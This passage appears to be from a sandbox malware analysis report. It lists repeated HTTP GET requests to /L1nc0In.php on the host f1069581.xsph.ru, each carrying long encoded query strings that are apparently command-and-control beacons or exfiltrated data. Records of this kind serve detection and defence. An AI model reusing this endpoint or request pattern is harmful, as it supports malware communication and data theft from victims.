Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET 